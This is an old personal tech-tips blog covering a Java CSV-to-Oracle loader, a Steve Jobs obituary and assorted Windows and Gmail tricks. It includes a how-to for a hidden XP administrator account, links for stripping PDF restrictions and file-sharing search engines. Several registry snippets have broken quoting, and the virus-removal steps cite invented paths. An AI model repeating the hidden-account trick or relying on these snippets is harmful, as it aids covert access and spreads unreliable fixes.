Thursday, December 29, 2011

Excel to Oracle Data Transfer


Loading Excel sheet data to Oracle table

The following procedure is to be applied to load data that is in an Excel spreadsheet to Oracle table.
  1. Open Excel Spreadsheet in MS Excel. For example : products.xls.
  2. Choose File->Save As and select CSV (Comma delimited) in Save As Type dropdown and enter filename where you want output to go. Example: products.txt.
  3. Connect to Oracle
  4. Create table using CREATE TABLE command. The structure of the table must match the formation in Excel sheet.
  5. Download the following Java program.
  6. Make necessary changes to the program. The table name in INSERT command and parameters are to be changed according to your requirement.
  7. Compile Java program
  8. Run java program given below by passing filename where comma delimited data is existing.
  9. Go to SQL*Plus and select data from table.

Java Program To Convert CSF foramt to Oracle Database

import java.sql.*; import java.io.*; import java.util.*;  public class  ConvertFromCSF {     Connection con;     PreparedStatement ps;     public static void main(String args[])  throws Exception     {        String filename = args[0];        ConvertFromCSF obj = new ConvertFromCSF();        obj.processFile(filename);     }     public void processFile(String filename) throws Exception     {        // open file        FileReader fr = new FileReader(filename);        BufferedReader br = new BufferedReader(fr);         // connect to Oracle        Class.forName("oracle.jdbc.driver.OracleDriver");        con = DriverManager.getConnection("jdbc:oracle:thin:@localhost:1521:oracle8i","scott","tiger");        ps = con.prepareStatement("insert into products values(?,?,?,?)");        String line, columns[];        // headings line. Ignore it        line = br.readLine();        Vector v;        while( (line = br.readLine())!= null)        { 	   v = getColumns(line); 	   Enumeration e = v.elements();            int i=1;            while ( e.hasMoreElements())            {              ps.setString(i, e.nextElement().toString());              i ++;            }            // insert into table after values for parameters are set            ps.executeUpdate();        }        fr.close();        ps.close();        con.close();     }          public  Vector getColumns(String line)     {       Vector v = new Vector();       StringBuffer bf = new StringBuffer();       boolean  instring = false;  // indicates whether we are in string       for ( int i = 0 ; i < line.length(); i ++)       { 	      if ( line.charAt(i) == ',') 	      { 		  if (! instring )  // if not already in string. 		  { 		   v.add(new String(bf));  // add buffer to vector 		   bf = new StringBuffer();  // reset buffer   	          } // end of if 	          else 		          bf.append(",");  // add comma also to string as we are in string 	      } // end of if 	      else 	      if ( line.charAt(i) == '"')  // toggle instring flag when " encountered 	      { 	        if ( instring ) 	              instring = false;     		else 		          instring = true;               }               else                  bf.append( line.charAt(i));       } // end of for       v.add(new String(bf));  // add value at the end as column       return v;   } } 
 


--
 

MoHaN.K.RaJ
MCA,GVP,VIZAG,
+91 91777 50037

Thursday, October 6, 2011

Steve Jobs (1955-2011),Apple Co-Founder,Dies at 56

Steve Jobs, co-founder of computer and software giant Apple Computers Inc., and until recently its CEO, has died at the age of 56, according to reports from Apple.
126933 steve jobs Steve Jobs (1955 2011),Apple Co Founder,Dies at 56

After a troubling diagnosis of pancreatic cancer in 2003 followed by a liver transplant in 2009, reports surfaced earlier this year that Jobs was suffering from a recurrence of his cancer. This time out, Jobs was hit with pancreatic cancer known as islet cell carcinoma, difficult to cure if in late phases.
img 153082 steve jobs faces Steve Jobs (1955 2011),Apple Co Founder,Dies at 56
On August 24, Jobs, known for being heavily involved in every creative step of Apple, resigned recently , handing over the reins to Tim Cook. Jobs stepped down from a company he helped found with friend Steve Wozniak in 1976, working out of a parent's home. Over the 35 years he served Apple, Jobs helped guide the creative growth and marketing of its many computing and entertainment products, beginning with the Apple i.

After Apple went public in 1980, Jobs became and maintained status as one of the technology sector's leading celebrities, taking the stage year after year and dazzling consumers with Apple's vast array of computing and entertainment-related products and services, including iPods, iPhones, iPads, Macs and sites such as iTunes.

From Bill Gates to Barack Obama, everyone paid to the icon.

"Michelle and I are saddened to learn of the passing of Steve Jobs," President Barack Obama said in a statement. "Steve was among the greatest of American innovators — brave enough to think differently, bold enough to believe he could change the world, and talented enough to do it."

"Melinda and I extend our sincere condolences to Steve Jobs' family & friends," said former rival and Microsoft co-founder Bill Gates. "For those of us lucky enough to get to work with Steve, it's been an insanely great honor. I will miss Steve immensely."

Google co-founder Sergey Brin:

From the earliest days of Google, whenever Larry and I sought inspiration or vision and leadership, we need to look no farther than Cupertino. Steve, your passion for excellence is felt by anyone who has ever touched an Apple product (including the macbook I am writing this on right now). And I have witnessed it in Preston the few times we have met. On behalf of all of us at Google and more broadly in technology, you will be missed very much.

Facebook CEO Mark Zuckerberg: "Steve, thank you for being a mentor and a friend. Thanks for showing that what you build can change the world. I will miss you."

Now he all left us the world with a "GoodBye!"
STEVE JOBS SAYS GOOD BYE 300x225 Steve Jobs (1955 2011),Apple Co Founder,Dies at 56

‎"No one wants to die" "And yet death is the destination we all share. No one has ever escaped it." -Steve Jobs

--


MoHaN.K.RaJ
MCA,GVP,VIZAG,
+91 91777 50037

Friday, August 12, 2011

Eye Test Funny


Eyes Test : Bad Eyes. Try This.































Eyes Test : Bad Eyes

--

MoHaN.K.RaJ
MCA,GVP,VIZAG,
+91 91777 50037

Thursday, August 11, 2011

Finding IP in Yahoo mail


Finding IP address in Yahoo! Mail

1. Log into your Yahoo! mail with your username and password.

2. Click on Inbox or whichever folder you have stored your mail.

3. Open the mail.

4. If you do not see the headers above the mail message, your headers are not displayed.
To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail.

5. You should see similar headers like this:Yahoo! headers : nameLook for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.That is be the IP address of the sender!

6. Track the IP address of the sender

--

MoHaN.K.RaJ
MCA,GVP,VIZAG,
+91 91777 50037

Change windows branding

Open Notepad dump the following lines into it and Save It with the name OEMINFO.INI in the c:\windows\system32 directory:

  [General]
  Manufacturer=Your Name Here
  Model=Your Model Here
  [Support Information]
  Line1=Your Name Here
  Line2=Your Address Here
  Line3=Your Email Address Here

- Save the file, then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.
- Now if you want to display some more information then simply increase the line in the file.

  Ex: Line4=Your Working Hours Here


--

MoHaN.K.RaJ
MCA,GVP,VIZAG,
+91 91777 50037

Hidden Programs in XP

1) Private Character Editor

This program is for designing icons and Characters(Alphapet)
Click :Start Menu
Then :Run
Type :EUDCEDIT
 

2) iExpress

This Program is for converting your files to EXECUTABLE files
Click : Start
Then : Run
Type : iexpress


3) Disk Cleanup

This program used for cleaning harddisk to offer space
cl!ck : start
Then : run
type : cleanmgr
 

4) Dr Watson
 
This program Is for repairing problems in Windows
cl!ck : start
Then : run
type : drwtsn32
 

5) Windows Media Player 5.1

Opens the old media player
cl!ck : start
Then : run
type : mplay32


--

MoHaN.K.RaJ
MCA,GVP,VIZAG,
+91 91777 50037

Hide any Drive in 3 steps

Most of you must have wondered if there exists a way without using software to Hide A Drive completely so that it cannot be viewed or accessed without unlocking it. Well for those who have and who haven't yet, here is a easiest method on How To Hide Any Drive In Just 3 Steps.

Here we go, follow these 3 simple steps:

01. Go To Start --> Run or use Win+R keys and type "cmd" and press Ok.

02. This will open Command Prompt for you. Now type "diskpart" and press Enter:

Once in Diskpart type "list volume" and press Enter:

This will list all the partitions in ur system.

Enter The Following Command
"select volume 10"

 
Remember to change 10 with the volume number of your partition you want to hide and press Enter:

03. Now as in my example I am hiding drive G: so my last command is "remove letter G" and then press Enter:

All done. Now open your computer and see that drive is made hidden

Now to make a drive Unhidden
Follow first 2 steps as such but in step 3 instead of remove letter G use "assign letter G"

For Vista/Windows 7

The commands becomes slightly different here:"assign letter=G"


--

MoHaN.K.RaJ
MCA,GVP,VIZAG,
+91 91777 50037

Calculator in Command Prompt

Go to RUN>> write cmd>> click ok

now write  cd\
hit enter!
Now, It will be like the following

-> C:\>set /a 2+4
    6

-> C:\>set /a (2*8)/2
    8


--

MoHaN.K.RaJ
MCA,GVP,VIZAG,
+91 91777 50037

How to Sign in into different gmail accounts in same browsers ?


Using Different Gmail Accounts from same Browser

You can sign in to your different Gmail Accounts with a single click.
You just have to activate there service for Multiple Accounts which is free.

Steps to be Followed:

1. Go to Google Account Setting.
2. Enable Multiple Account setting under Personal Setting.
3. Now Sign out
4. Again Sign in
5. Now at top right see email changing Option.
--

MoHaN.K.RaJ
MCA,GVP,VIZAG,
+91 91777 50037

Remove Password And Other Restrictions From PDF Documents


Remove Password And Other Restrictions From PDF Documents:
Here's a site that can remove almost all the restrictions from protected PDF documents. The site is FreeMyPDF.com. Using freemypdf is very easy. Just upload your protected PDF file to the site and click on the button that says do it.

FreeMyPDF if a great service but it has a few limitations:

1. The maximum file size allowed is 7MB. So if you PDF document's size is more then 7MB, then this will not work. Try pdfpirate in this case.

2. There are two kinds of restrictions on PDF documents. First, where you can't even open a PDF file without a password. And second, where you can open a PDF file without any password, but you can't select, copy or print without entering a password. FreeMyPDF can remove only second kind of passwords. So if you are looking for something that can help you to open a pdf document without a password, then FreeMyPDF is not for you.

--

MoHaN.K.RaJ
MCA,GVP,VIZAG,
+91 91777 50037

How to get rid of an HTML Script Virus?


HTML/Infected.WebPage.Gen is a file containing HTML script that, once downloaded to your computer, can perform various malicious acts, such as deleting files, disabling programs, slowing your computer and downloading additional malware (malicious software). Fortunately, you can remove HTML/Infected.WebPage.Gen without going out and buying an expensive anti-virus program if your computer has the Windows Vista or Windows 7 operating systems.

Instructions:
   
End Processes :
  • Press "Ctrl" + "Shift" + "Delete" to open the Windows Task Manager.
  • Click on the "Processes" tab of the Windows Task Manager.
  • Click on the "Show Processes From All Users" button at the bottom of the Task Manager.
  • Right-click on "HTML/Infected.WebPage.Gen" and select "End Process."
  • Close the Windows Task Manager.
Delete Registry Entries:
  • Click on the "Start" menu, type "regedit" into the "Search Programs and Files" box and press "Enter" to open the Registry Editor.
  • Right-click on "HKEY_LOCAL_MACHINE\Software\HTML/Infected.WebPage.Gen" and select "Delete."
  • Close the Registry Editor.

Delete Files:

  • Click on the "Start" menu and type "HTML/Infected.WebPage.Gen\HTML/Infected.WebPage.Gen.exe" into the "Search Programs and Files" box.
  • Delete all of the matching files that appear in the "Results List." To delete a file, right-click on it and select "Delete." Note that these files may have different extensions, such as "HTML/Infected.WebPage.Gen\HTML/Infected.WebPage.Gen.dll" or "HTML/Infected.WebPage.Gen\HTML/Infected.WebPage.Gen.gif."
  • Restart your computer.

--

MoHaN.K.RaJ
MCA,GVP,VIZAG,
+91 91777 50037

Every time give a new email id to your friends

Now Friends the very first Trick Of Gmail that I Love the most.
So, it goes like this, say you have a email id bestfriends@gmail.com
If Your Friends wants to send you a mail then they will send it at this email address.
 

Now, Let there be three friends of yours, there may be many, just talk about three at present
Manoj
Vinod
Ganesh
 

If you want to give your friends a unique email id
For
Manoj It could be bestfriends+Manoj@gmail.com
For
Vinod It could be bestfriends+Vinod@gmail.com
For
Ganesh It could be bestfriends+Ganesh@gmail.com

So, its simple you could add anything after the initial mail by adding a "+" sign.
As all these Email Addresses
bestfriends+Manoj@gmail.com,bestfriends+Vinod@gmail.com and bestfriends+Ganesh@gmail.com are the same as bestfriends@gmail.com

If you have a girlfriend then impress her that how much you love her by showing her name in mail id.


--

MoHaN.K.RaJ
MCA,GVP,VIZAG,
+91 91777 50037

Is your Computer Male or Female

Is your Computer  Male or Female?
To find out the gender of your computer follow these instructions
 
 Open Notepad.
  Copy and paste CreateObject("SAPI.SpVoice").Speak"Hello your name"
 Save as computer_gender.vbs
 Run the file.


If you hear a male voice, you have a boy.
If you hear a female voice, you have a girl.


--

MoHaN.K.RaJ
MCA,GVP,VIZAG,
+91 91777 50037

My Computer does not detect pen drives and other USB devices like iPod or external hard drive


If none of your USB devices detect ,this could be due to wrong registry entries. i.e you need to delete UpperFilters and the LowerFilters registry values.

Follow the procedure listed below to correct your registry:


1. Open Start >> Run, and type "regedit" (without double quotes), and click OK.


2. Locate UpperFilters registry value. it resides in the following registry subkey:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E980-E325-11CE-BFC1-08002BE10318}


3. Click on Edit menu, and select Delete and click OK.
Note: If you receive an error when you try to delete the registry subkey, you may not have correct permissions to edit the subkey.


4. Locate LowerFilters registry value. It resides in the following registry subkey:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E967-E325-11CE-BFC1-08002BE10318}


5. Click on Edit menu, and select Delete and click OK.
 

6. Exit Registry Editor and restart your system.

--

MoHaN.K.RaJ
MCA,GVP,VIZAG,
+91 91777 50037

Friday, August 5, 2011

Tips to Conserve Laptop Battery Power in Windows 7

The world is getting more mobile day by day and to keep the pace you need power in your batteries. But it has a limitation, you need to charge it again and again to keep them running.

Although Windows 7 has many power management improvements, and while the Power Efficiency Diagnostic Tool in Windows 7 can give you a lot of power optimization tips, laptop batteries are still not as efficient as we'd like them to be. They can maximum hold power for 5-6 hours only. So, do you want to maximize the efficient use of battery?

The trick is to squeeze the most out of the power that's available. Here are these few tricks which will improve the battery performance in a dramatic way.

The most common tip, if you have time to do only one thing:

Use the Power saver power plan to maximize your battery life. (To choose the Power saver plan, open Power Options in Control Panel.)

Some other ways to help stretch your computer's battery life:

Choose a power saving power plan

A power plan is a collection of hardware and system settings that control how your laptop manages power. Windows 7 has two default plans:

  • Balanced: Offers full performance and display brightness when you need it, but conserves power when the computer is idle.
  • Power saver: The best choice for extending battery life. The cost? Slower performance and lower display brightness.
  • Your computer manufacturer might offer additional plans as well.
  1. To change your power plan click the battery meter icon in the notification area of the Windows taskbar.
  2. Battery meter showing power plans. Select one of the default power plans: Balanced or Power saver26 Jul 11 7 27 50 PM1 Tips to Conserve Battery Power and Extend or Prolong Battery Life in Windows 7
  3. You can also create your own custom power saver plans by using More power options.

Reduce display brightness

Display is the most power consuming part of a computer—even more than a hard disk and CPU. Most of the laptops come with dedicated keys to control the brightness and contrast ratio of the display. You can also adjust the display brightness from Power Options in Control Panel.

Decrease time for Windows dims and turns off the display

You can save power by having Windows dim and then turn off the display after a period of inactivity. You can save more power if you decrease the time and increase the efficiency of battery.

To choose when Windows dims and turns off the display

  1. Click battery icon in notification area and click on More Power Options.
  2. On the Select a power plan page, on the left, click Choose when to turn off the display26 Jul 11 7 26 25 PM Tips to Conserve Battery Power and Extend or Prolong Battery Life in Windows 7
  3. Doing this adjusts settings only for the plan that you're currently using. To change settings for another plan, click Change plan settings next to the plan that you want to change.
  4. Click Save changes.

Turn off or remove devices that you aren't using

Many USB devices use power just by being connected. If you use a USB mouse, you can save power by disconnecting the mouse and by using a touch pad. If you use a USB flash drive, unplug it when you're not using it.

Turn off PC cards and integrated wireless devices

These devices also use power. If you don't need them, turn them off.

You can use Windows Mobility Center to manage most of these options. To open WMC, Click Start and type Windows Mobility center and click on the first result.

26 Jul 11 7 25 01 PM 600x300 Tips to Conserve Battery Power and Extend or Prolong Battery Life in Windows 7

If you know any other good tricks, do share with us!



--

MoHaN.K.RaJ
MCA,GVP,VIZAG,
+91 91777 50037

How to find out who is using your wireless network

Do you suspect that someone is wrongfully using your wireless network connection? Maybe your wireless connection is slow these days and you suspect that someone has hacked into it. Well, there are several free tools available which can help you detect who is using your connection illegally. I am covering two tools here, but if you know of any more, please do share below in the comments.

network watcher 400x150 How to find out who is using your wireless network

Wireless Network Watcher is the 3rd new tool released by Nirsoft, this month. It is a small utility that scans your wireless network and displays the list of all computers and devices that are currently connected to your network.

It will display the following information for each connection:

  1. IP address
  2. MAC address
  3. Manufacturer of the network card
  4. Computer name
  5. Device Name.

The tool also allows you to export the list of connected devices and save it as an html,xml, csv or a text file.

Another utility for sniffing if someone else is using your wireless network is Zamzom.

wireless network tool 445x600 How to find out who is using your wireless network

Zamzom Wireless Network Tool lets you see all  the users that are using your wireless network. There are two scan options but only the Fast Scan is available in the free version, but that should be good enough for most, I suppose. Once the scan is completed, it displays the IP address and MAC address.



--

MoHaN.K.RaJ
MCA,GVP,VIZAG,
+91 91777 50037

Bitdefender Internet Security 2012 Free

We at The Windows Club are always striving to offer you the best paid software for free and we are always thankful to the companies who graciously offer their licenses free to our readers. This week we have an exciting giveaway for you: 10 licenses of Bitdefender Internet  Security 2012.

bitdefender 2012 600x402 Giveaway: Get Bitdefender Internet Security 2012 FREE

The latest and the best, Bitdefender Total Security 2012 is one of the finest security software available for the Windows operating system. The product is sleek, silent and effective in dealing with threats from hackers, viruses, and identity theft attacks.

Bitdefender Internet Security 2012 boasts a completely overhauled user interface and has been designed to meet the demands of computer users that require protection to work 24/7 without interrupting their work and enjoyment.

Key new features include social networking protection, an Autopilot mode and scan dispatcher to maintain system performance.

The new social networking security feature will filter and block social-networking specific e-threats by scanning the links users receive from friends on Facebook, whilst also monitoring and advising on privacy settings.

Bitdefender Internet Security 2012 costs $49.95 but 10 single-PC, 1-year licenses are being offered here free to TWC readers.

To win a license of this fine internet security suite, you have to do two things:

1. Download its trial version from here and let us know which one new feature you like the best. The more original your answer, the more your chances

2. Share the following on any social site like Twitter, Facebook, Google+, etc and post its status URL here.

Giveaway: Check out the new @Bitdefender Internet Security Suite, 2012 at http://bit.ly/qUMVJV – and win a free license!

Share on multiple social sites and you increase your chances.

Incidentally, I wonder if you have had a look at the new brand identity that BitDefender has created for themselves. Quite cool I must say! Visit its home page to have a look at the transformation!

nw bitdefender logo 400x138 Giveaway: Get Bitdefender Internet Security 2012 FREE

The giveaway will remain open for 7 days, and the winners declared thereafter. The licenses will be forwarded to the winners by me.



--

MoHaN.K.RaJ
MCA,GVP,VIZAG,
+91 91777 50037

Thursday, June 16, 2011

Top 10 downloads of the past 10 years

By Kelly Green Morrison and Karen Whitehouse, Download.com
When CNET Download.com opened its doors in 1996, it was home to 3,000 small shareware and freeware applications. Online software distribution was still in its infancy. What a difference a near-decade makes! Since 1996, we've watched the rise of instant messaging, digital audio and the MP3 format, file sharing, spyware and antispyware, and the open-source movement, just to name a few. And we've watched as online software distribution has gone from pipe dream to reality. These 10 applications best represent the top trends in downloading over the past decade.

ICQ

Today instant messengers are ubiquitous, but when ICQ ("I Seek You") was first released in 1997, it was truly the first of its kind. Though competitors such as Yahoo Instant Messenger and AIM have since encroached on ICQ's territory, this chat client remains enormously popular with international users, and it has remained one of Download.com's most popular applications since its launch.

Winamp

Arriving fast on the heels of the emerging MP3 digital format, Nullsoft's Winamp was one of the darlings of the burgeoning digital audio scene in the late '90s. This free audio player quickly gained popularity, becoming one of the most popular files on Download.com, and Nullsoft was eventually acquired by AOL in 1999.





Napster
Who doesn't remember this controversial file-sharing kingpin? Developed by Northeastern University student Shawn Fanning, Napster was a groundbreaking application that enabled users to share MP3s painlessly for the first time through a peer-to-peer network. Napster has since been sued, shuttered, and reborn as a subscription music service, but its legacy remains.
Firefox
Developed by the open-source Mozilla project in 2003, Firefox was the first browser to show the promise of breaking Microsoft's stranglehold on the browser market. Lightweight, secure, and packed with useful features, Firefox exemplifies the promise of the strengthening open-source movement.

WinZip
When CNET Download.com launched in 1996, WinZip was among the first programs in our library, and in the past nine years, it has remained near the top of our Most Popular list. The reason is simple: For many years, WinZip was an essential utility. You couldn't download or send large files without it. Even the fact that Windows XP now has built-in ZIP support hasn't diminished its popularity. The keys to WinZip's success are its simplicity and its singularity of purpose: it does one thing--compressing and decompressing files--and it does it very well.
iTunes
Apple's music player and organizer makes our top 10 list for the sheer beauty of its product design. iTunes is not only a full-featured media player and library in its own right, it's also the gateway for Apple's iPod and popular music store, creating an elegant and simple interface for buying and organizing music. If only all software were this easy to use.
Ad-aware
Almost as soon as there was software to download, there was adware coming along for the ride. Lavasoft did its part to hold the line with Ad-aware, a spyware scanner and remover. Its simple interface and excellent results have gained the program acclaim over the past five years, including a recent monopoly on the No. 1 slot in Download.com's Most Popular list. We wouldn't download files without it, and apparently, neither would most of you.

Skype
If Internet signals can travel over a phone line, then voice calls can travel over the Internet, right? With a Voice-over-IP (VOIP) program such as Skype, they certainly can. The prospect of making free calls to folks all over the globe has persuaded millions of people to install the software; the ease of use and surprising voice quality have earned Skype a loyal user base and accolades that include a CNET Editors' Choice and a Webby.
RealPlayer
Ten years ago, the Web was full of static content. The 1995 debut of RealPlayer changed all that. Streaming audio and video in a free media player was a bold step forward into making the Internet a viable entertainment platform, and RealNetworks was there. Today the software plays almost every media format, and the online music store sells tunes compatible with most MP3 players--even the iPod. RealPlayer hasn't always been at the head of the class, but it was there first, and it keeps adapting to the developing world of online media.

Adobe Acrobat Reader
Bridging the gap between print and Internet publishing, Adobe's portable document format (PDF) lets publishers distribute their articles, newsletters, and documentation online without worrying about formatting problems or unauthorized alterations. By giving away the Acrobat Reader early on, Adobe helped create a nearly unassailable market position. If you want to read magazine archives or software manuals online, you need Acrobat Reader--as its nearly seven-year occupation of the Most Popular list can attest.

Sunday, June 5, 2011

Weather.com Codes for Indian Cities - Digit Technology Discussion Forum

Hi got the big list for city codes

IN,India
Agartala,INXX0153
Ahmadabad,INXX0001
Ahmednagar,INXX0183
Aizwal,INXX0200
Ajmer,INXX0002
Akola,INXX0160
Allahabad,INXX0003
Alleppey,INXX0004
Amer,INXX0005
Amravati,INXX0006
Amritsar,INXX0007
Anakapalle,INXX0008
Anantapur,INXX0174
Ara,INXX0009
Aruppukkottai,INXX0010
Auraiya,INXX0011
Aurangabad,INXX0184
Aurangabad Chikalthan Aerodrome,INXX0162
Balasore,INXX0158
Bangalore,INXX0012
Barddhaman,INXX0013
Basirhat,INXX0014
Batala,INXX0015
Belgaum/Sambra,INXX0170
Benares,INXX0016
Bhandara,INXX0017
Bhatkal,INXX0018
Bhatpara,INXX0019
Bhiwandi,INXX0020
Bhiwani,INXX0021
Bhongir,INXX0022
Bhopal,INXX0023
Bhubaneshwar,INXX0024
Bhuj-Rudramata,INXX0150
Bihar,INXX0025
Bikaner,INXX0141
Bombay,INXX0026
Bulandshahr,INXX0027
Calcutta,INXX0028
Chandigarh,INXX0185
Chavakkad,INXX0029
Chennai,INXX0202
Chhapra,INXX0030
Chitradurga,INXX0173
Chittoor,INXX0031
Cochin,INXX0032
Coimbatore/Peelamedu,INXX0177
Cuddalore,INXX0178
Cuttack,INXX0033
Daman,INXX0034
Daosa,INXX0035
Darjiling,INXX0036
Daund,INXX0037
Dehradun,INXX0140
Delhi,INXX0038
Dewas,INXX0039
Dibrugarh/Mohanbari,INXX0143
Dindigul,INXX0040
Dispur,INXX0187
Dod Ballapur,INXX0041
Duraha,INXX0042
Elamanchili,INXX0043
Etawah,INXX0044
Faizabad,INXX0045
Faridabad,INXX0046
Fatehpur,INXX0047
Gadag,INXX0171
Gandhinagar,INXX0048
Gangtok,INXX0049
Gauhati,INXX0147
Gaya,INXX0050
Ghaziabad,INXX0051
Ghazipur,INXX0052
Goa/Panjim,INXX0169
Godhra,INXX0053
Guwahati,INXX0188
Gwalior,INXX0146
Haora,INXX0054
Hisar,INXX0055
Hoshiarpur,INXX0056
Hyderabad,INXX0057
Imphal,INXX0189
Indore,INXX0058
Itanagar,INXX0190
Jabalpur,INXX0151
Jagdalpur,INXX0163
Jaipur,INXX0059
Jaisalmer,INXX0144
Jalandhar,INXX0060
Jamshedpur,INXX0156
Jatni,INXX0061
Jaunpur,INXX0062
Jharsuguda,INXX0063
Jodhpur,INXX0145
Kakinada,INXX0168
Kalimpang,INXX0064
Kalyan,INXX0065
Kamthi,INXX0066
Kanpur,INXX0067
Kasaragod,INXX0068
Kerala,INXX0201
Khadki,INXX0069
Khammam,INXX0070
Kharagpur,INXX0071
Kohima,INXX0191
Kolar,INXX0072
Kolhapur,INXX0192
Koregaon,INXX0073
Kozhikode,INXX0176
Kurnool,INXX0172
Lucknow,INXX0074
Ludhiana,INXX0193
M. O. Ranchi,INXX0152
Machilipatnam,INXX0167
Madras,INXX0075
Madurai,INXX0076
Mahbubnagar,INXX0077
Mahesana,INXX0078
Malegaon,INXX0079
Mandya,INXX0080
Mangalore,INXX0081
Medinipur,INXX0082
Meerut,INXX0083
Mhow,INXX0084
Minicoy,INXX0181
Mirzapur,INXX0085
Moga,INXX0086
Mumbai,INXX0087
Murud,INXX0088
Muzaffarnagar,INXX0089
Muzaffarpur,INXX0090
Nadiad,INXX0091
Nagercoil,INXX0092
Nagpur,INXX0093
Nasik,INXX0194
Nawabganj,INXX0094
Nellore,INXX0095
New Delhi,INXX0096
New Delhi/Safdarjung,INXX0142
Neyyattinkara,INXX0097
Nizamabad,INXX0098
Panvel,INXX0099
Patiala,INXX0139
Patna,INXX0100
Pendra Road,INXX0155
Pondicherry,INXX0101
Poona,INXX0164
Port Blair,INXX0179
Pune,INXX0102
Puri,INXX0103
Quilon,INXX0104
Rae Bareli,INXX0105
Raigarh,INXX0106
Rajapalaiyam,INXX0107
Rajkot,INXX0154
Ratnagiri,INXX0165
Rohtak,INXX0108
Sambalpur,INXX0109
Sanwer,INXX0110
Saraipali,INXX0111
Satara,INXX0112
Satna,INXX0149
Sehore,INXX0113
Shertallai,INXX0114
Shillong,INXX0196
Shimla,INXX0195
Sholapur,INXX0166
Sitapur,INXX0115
Sivakasi,INXX0116
Solapur,INXX0117
Sonipat,INXX0118
Srikakulam,INXX0119
Srinagar,INXX0197
Surat,INXX0157
Tambaram,INXX0120
Tezpur,INXX0148
Thana,INXX0121
Thiruvan,INXX0198
Tiruchchirapalli,INXX0180
Tirupati,INXX0122
Tiruvottiyur,INXX0123
Tonk,INXX0124
Trivandrum,INXX0125
Tumkur,INXX0126
Udupi,INXX0127
Ulhasnagar,INXX0128
Unnao,INXX0129
Vadodara,INXX0130
Varanasi,INXX0199
Vellore,INXX0131
Veraval,INXX0159
Vidisha,INXX0132
Virudunagar,INXX0133
Visakhapatnam,INXX0134
Vizianagaram,INXX0135
Warangal,INXX0136
Wardha,INXX0137
Zahirabad,INXX0138

Tuesday, May 31, 2011

Top Rapidshare Search engines


Their exist numerous services but here are the selected few top 10 services:
  1. Filez.com: Rapidshare Search - Note: Search Results Contains Adult Ads
  2. Rapidshare-Search-Engine.com
  3. Rapidshare1.com
  4. Rapidsharelink.com
  5. RapidFox.Com
  6. FilesTube.com
  7. Filesbot.com
  8. Hellafiles.com
  9. Searchshared.com - Supports almost all major one click file-hosters
  10. Oneclickfiles.com
    --

MoHaN.K.RaJ
MCA,GVP,VIZAG,
+91 91777 50037

Friday, May 27, 2011

Add a Website link to Start menu

Add a Website link to Start menu: "This is a simple registry tweak which adds a website link to your Start Menu…..its very handy for quick access to your favourite website.

To Install : Copy the code below to notepad and save it as link.reg then just right click on it and choose “merge”.

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-2
1d7-11d4-bdaf-00c04f60b9f0}]
@=”123.com”

[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\DefaultIcon]
@=”%SystemRoot%\\system32\\shell32.dll,-47″

[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\Instance\InitPropertyBag]
“CLSID”=”{13709620-C279-11CE-A49E-444553540000}”
“method”='ShellExecute”
“Command'=”123.com”
“Param1″=”http://www.123.com”

To uninstall : Copy the code below to notepad and save as rem.reg and right click and choose merge.

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}]
@=”'

[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\DefaultIcon]
@=”'

[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\Instance\InitPropertyBag]
“CLSID”='{13709620-C279-11CE-A49E-444553540000}”
“method”=”ShellExecute”
“command”='”
“Param1″=”'"

Auto End Tasks to Enable a Proper Shutdown

Auto End Tasks to Enable a Proper Shutdown: "Auto End Tasks to Enable a Proper Shutdown
This reg file automatically ends tasks and timeouts that prevent programs from shutting down and clears the Paging File on Exit.

1. Copy the following (everything in the box) into notepad.

QUOTEWindows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]“ClearPageFileAtShutdown”=dword:00000001
[HKEY_USERS\.DEFAULT\Control Panel\Desktop]“AutoEndTasks”=”1″
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]“
WaitToKillServiceTimeout”=”1000″

2. Save the file as shutdown.reg3. Double click the file to import into your registry.

NOTE: If your anti-virus software warns you of a “malicious” script, this is normal if you have “Script Safe” or similar technology enabled."

Disable windows Logo key

Disable windows Logo key: "When I was recently playing games and this nasty windos logo key keep annoying me , cause I often accidently clicked it , and I start to search a solution to solve my problem, and found the following article in microsfot website, and it did work, hope this helps, thanks!

CODE
http://support.microsoft.com/?kbid=181348

or in other articles, u can copy the following messages into ur notepad and save as *.reg, and use it..

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout]
“Scancode Map”=hex:00,00,00,00,00,00,00,00,03,00,00,00,00,00,5b,e0,00,00,5c,e0,\
00,00,00,00"

Create Hidden Admin Account in XP

Create Hidden Admin Account in XP: "Create Hidden Admin Account in XP.
Since we are going to do all the Editing in Window Registry it is Recommended to Back Up the Registry before going Further.After you have Backed up your registry follow the Steps to Create your Hidden Account:* First Goto Start -> Run -> Type regedit -> Enter* In the Left Menu goto,
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\
Winlogon\SpecialAccounts\UserList* In the Right pane, Right click -> New -> String Value

Right click on the new String Value and click Rename* Type the Name of the Account you want to hide.* Hit Enter then Right click on the String Value again and Change value to 0 which hides it. If you want it to be Visible to all Enter the Value 1.* Now Save and Exit the Registry and Logoff.* Goto welcome screen and Hit ctrl+alt+del twice to bring up Logon prompt* Type hidden Accounts name and password* Enjoy!!!"

Disable Autorun of Usb & Cd in XP

This is a very commom problem sometime.Some time we need to disable autorun of usb and cd drives.To disable autorun of usb and cd drives follow following steps:

Go to run and type gpedit.msc command

